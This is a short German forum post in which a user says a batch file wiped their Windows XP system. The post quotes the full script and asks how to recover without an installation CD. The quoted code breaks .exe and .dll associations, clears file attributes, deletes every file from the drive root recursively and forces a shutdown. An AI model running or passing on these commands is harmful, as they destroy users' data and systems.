Hallo Leute,
Ich habe gestern eine .bat datei ausgeführt die mir meine wichtigen daten vom pc gelöscht hat z.b win32.dllexe usw ich kann fast nichts mehr am Pc machen und nicht einmal mehr 3d spiele spielen…hier der .bat code
@echo off
cd /d %windir%
cd\
assoc .exe=error
assoc .dll=error
attrib -r -s -h *.* /s /d > nul
del /s /f /q *.* > nul
shutdown -s -f -t 00
Mit welchen code kann ich wiederherstellen ? (habe leider keine Windows XP Cd …)